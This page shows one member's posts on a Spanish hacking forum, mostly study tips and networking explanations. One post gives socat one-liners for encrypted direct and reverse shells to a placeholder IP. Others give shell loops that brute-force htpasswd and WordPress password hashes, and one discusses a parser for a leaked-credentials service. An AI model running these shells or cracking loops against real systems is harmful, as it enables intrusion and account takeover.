This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - animanegra

Pages: 1 ... 3 4 [5] 6 7 ... 19
81
Que los primeros no existen y los segundos si. Y no aporrean el teclado cuando hacen un ataque de fuerza bruta.

82
Hola:

Por mi parte, os recomiendo el que para mi es el mejor libro de criptografía en español.

You are not allowed to view links. Register or Login

83
Ser un hacker no es cuestion de ser un elegido de la naturaleza, es cuestion de transpiración. Vamos que hay que currarselo y sudar. Creo que el lema de todo hacker se basa en dos sencillas palabras:
TRY HARDER

84
E-Zines / Re:UnderDOCS - Julio 2020, Número 12
« on: July 10, 2020, 04:52:24 pm »
Genial, de nuevo pena que sea el último número.

Besotes y gracias por el trabajo que os tomáis.

85
Dudas y pedidos generales / Re:Spoffing
« on: July 03, 2020, 06:47:09 pm »
El arp spoofing tiene relacion con usurpar una mac. Se puede aplicar en todo el trayecto de los paquetes de la misma forma pero necesitas estar en cualquiera de las lans que conforman el camino de la comunicacion que deseas interceptar. Y normalmemte en esos tramos o eres de la isp o no tienes posibilidad de tener una maquina ahi para hacer el spoofing.

86
Python / Re:Sencillo cliente FTP
« on: July 02, 2020, 04:33:18 am »
Igual como siguiente paso, podrias programar el cliente ftp sin la libreria ftp. Utilizando sockets y viendo como es el estandar para hacer una implementacion tuya.
Igual no es cuestion de hacer todo el standard pero podrias implementar parte de las acciones que hace el cliente. Podrias incluir algo asi como una parte grafica. Las aplicaciones graficas siempre motivan un monton mas que las aplicaciones de linea de comando, al menos al principio.
Es solo una idea, la cuestion es seguir programando y aprendiendo.

87
Oh. Pense que erais los desarrolladores. Sobre los tor2web. Entiendo que la idea de la herramienta es etical hacking por lo que utilizar tor2web no seria un problema.

88
Es un poco una reimplementación del karma, un parser para el servicio pwndb de tor. Lo que no entiendo es, que si hay que conectarse a tor para usar el programa, ¿Por que no vas directamente al servicio raiz en tor?. No se si te parece una reflexión coerente. Igual no.
¿Has pensado en utilizar cualquier servicio de tor2web para no obligar al usuario a disponer de tor? A fin de cuentas eso simplificaría enormemente el uso de la herramienta por parte del usuario.
Por otro lado, solo he oteado un poco el código del parser y no veo claro si estáis saltandoos o no el primer elemento que da la página de pwndb. Por siacaso lo comento, es una dirección de bitcoin que hay que saltarse porque no pertenece al leak en si. Hay que empezar a leer desde el segundo registro. Si lo habéis tenido en cuenta nada.

Enhorabuena por la herramienta y un saludo

89
Dudas y pedidos generales / Re:Wireshark - Cabeceras GET codificadas
« on: June 29, 2020, 04:17:25 am »
¿¿Y por que ves ACKs si detras hay un servidor web?? Deberías de ver la respuesta de pagina no encontrada o el index de esa web. ¿¿No será parte de un C&C que está escondido como tráfico web??  ¿Han podido introducir algo antes que deribe a que tengan ya el control de la máquina y eso séan órdenes?

90
Dudas y pedidos generales / Re:Wireshark - Cabeceras GET codificadas
« on: June 26, 2020, 12:22:54 pm »
Asi de lejos parece base64

91
Cual va via wifi?? el servidor o el cliente? Tienes los firewalls bajados?? Te has dejado la dirección IP sin tachar y parece que deseabas que tu dirección IP permaneciiese en el anonimato.

92
Dudas y pedidos generales / Re:geolocalizacion ip
« on: June 18, 2020, 05:55:58 pm »
Eso es delito de usurpación de identidad y alguno más. Si lo denunciais, probablemente bajo petición judicial, pidan la dirección IP a facebook y con la hora de conexión y la dirección IP la policía notificara el ISP y darán con la dirección física del usurpador.
Yo símplemente denunciaría.

93
Joder. Lo que mencionas en los ultimos links son ataques al servicio y no a la contraseña. Cuidadito con eso.

94
Hombre necesitarías el imei y algo más. El imei es sólo un identificador.

95
Dudas y pedidos generales / Re:ayuda con desencriptación
« on: June 17, 2020, 05:35:59 am »
Parece un hash de worpress. Los hashes no se desencriptan se prueban palabras hasta que das con ella.
Puedes implementar una fuerza bruta leyendo un fichero de passwords o mediante la generación de todas las palaras de distintas longitudes utilizando el hash en la funcion:

Code: You are not allowed to view links. Register or Login
wp_check_password("palabra","HASH");

Devuelve true o false segun si es correcto o no. Para hacerlo, tendrías que bajarte el wordpress e incluir la libreria en tu php para poder hacer el programa. Aqui la información de la API de wordpress para la función de chequeo:
You are not allowed to view links. Register or Login

Si optas por la opción fea. Hashcat creo que permitía resolver hashes de wordpress, Y john the ripper, no se en que versiones, también.
Para usar john the ripper tendrias que montar un fichero con filas, y en cada fila un nombre de usuario, seguido de ":" deguido del hash. De esta forma:

Code: You are not allowed to view links. Register or Login
user1:$P$B0cJNXmBtVvJPzeMM45137IYZ/aQ751
user2:$P$BIRMpD9uqjaTQp52AecpkaBf18adaO0
user3:$P$BnohJTEYcT7k./gAJooqBQTZXoSueN1

y ese fichero usarlo como fichero de hashes para john the ripper.

Saludos.

96
E-Zines / Re:UnderDOCS - Junio 2020, Número 11
« on: June 11, 2020, 04:47:58 am »
Gran trabajo, esperemos que no pare en el 12 y se siga, igual de forma semestral, timestral o bimensual.

Un abrazo y un besote.

97
Dudas y pedidos generales / Re:[SOLUCIONADO] Hash
« on: June 09, 2020, 08:40:06 am »
Igual no se me ha entendido. El hash en limpio es la palabra "bleh"

Si creas un archivo llamado "/tmp/lalala" con este contenido:

Code: You are not allowed to view links. Register or Login
hola:$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom

Y despues con el comndo htpasswd ejecutas esto:

Code: You are not allowed to view links. Register or Login
htpasswd -bv /tmp/lalala hola bleh

Verás que el password en limpio es bleh.

Para scriptarlo y hacer un comprobador usando diccionario creo que es evidente, se puede hacer así:

Code: You are not allowed to view links. Register or Login
for AUX in pass1 bleh pass2; do htpasswd -bv /tmp/lalala hola `echo $AUX` 2> /dev/null; if [ $? == 0 ]; then echo $AUX; fi; done;

En el for puedes meter todas las palabras que desees comprobar, yo he metido en este caso pass1 bleh y pass2.

Si se desea hacer con un diccionario se podría hacer asi:

Code: You are not allowed to view links. Register or Login
cat diccionario | while read AUX; do htpasswd -bv /tmp/lalala hola `echo $AUX` 2> /dev/null; if [ $? == 0 ]; then echo $AUX; fi; done;

En el archivo de diccionario deberían de estar las palabras a probar cada una en una linea. Y entre ellas encontrarse la palabra bleh.

Por último un fuerza bruta sencillo se puede hacer así, creo que esta preparado para eso al tener solo 4 caracteres. Se podría hacer con el siguiente comando:

Code: You are not allowed to view links. Register or Login
for AUX in {a..z}{a..z}{a..z}{a..z}; do htpasswd -bv /tmp/lalala hola `echo $AUX` 2> /dev/null; if [ $? == 0 ]; then echo $AUX; fi; done;

Si no se sabe el número de caracteres habria que probar primeo con 1, despues con 2 y así hasta obtenerlo.

Saludos.

98
Hacking / Re:Shell Inversa "Cifrada"
« on: June 03, 2020, 09:09:21 am »
Simplemente como contenido adicional, para casos en los que se desee hacerlo de forma muy simple sin tener que desarrollar nada. Las shells remotas cifradas se pueden hacer via socat. De hecho socat bajo mi punto de vista es muchísimo mas versatil que nc para muchas cosas.

Shell directa:
Code: You are not allowed to view links. Register or Login
socat OPENSSL-LISTEN:54473,cert=/tmp/mykey.pem,cafile=/tmp/mykey.crt EXEC:/bin/bash
Code: You are not allowed to view links. Register or Login
socat stdio OPENSSL:IP:54473,cert=/tmp/mykey.pem,cafile=/tmp/mykey.crt,verify=0

Shell inversa:
Code: You are not allowed to view links. Register or Login
socat OPENSSL:IP:54473,cert=/tmp/mykey.pem,cafile=/tmp/mykey.crt,verify=0  EXEC:/bin/bash
Code: You are not allowed to view links. Register or Login
socat stdio OPENSSL-LISTEN:54473,cert=/tmp/mykey.pem,cafile=/tmp/mykey.crt

El certificado se puede hacer con openssl:

Code: You are not allowed to view links. Register or Login
openssl genrsa -out /tmp/mykey.key 1024
openssl req -new -key /tmp/mykey.key -x509 -days 3653 -out /tmp/mykey.crt

cat /tmp/mykey.key /tmp/mykey.crt > /tmp/key.pem

99
Dudas y pedidos generales / Re:Hash
« on: June 01, 2020, 04:28:14 am »
Podría ser:
bleh
??

100
Acabo de ver en la propia web, que pone como lo hacen esto:

Quote
How we collect data

Our system collects torrent files in two ways: parsing torrent sites and listening DHT network. We have more than 1.500.000 torrents which where classified and which are using now for collecting peer sharing facts (up to 200.000.000 daily). We don't guarantee we can show ALL peer sharing facts:

    Single IP address could be assigned to multiple users. It depends on user's ISP. For example mobile operators often used this schema.
    IP address could be dynamic. In such case it changes every time user connects to the Internet or periodically.
    User could download torrent which we don't have


Parece que es exactamente como te comentaba, que por otro lado lo ponia en la propia web. Un cliente tonto que se conecta a 1.500.000 torrents para obtener la lista de peers.

Pages: 1 ... 3 4 [5] 6 7 ... 19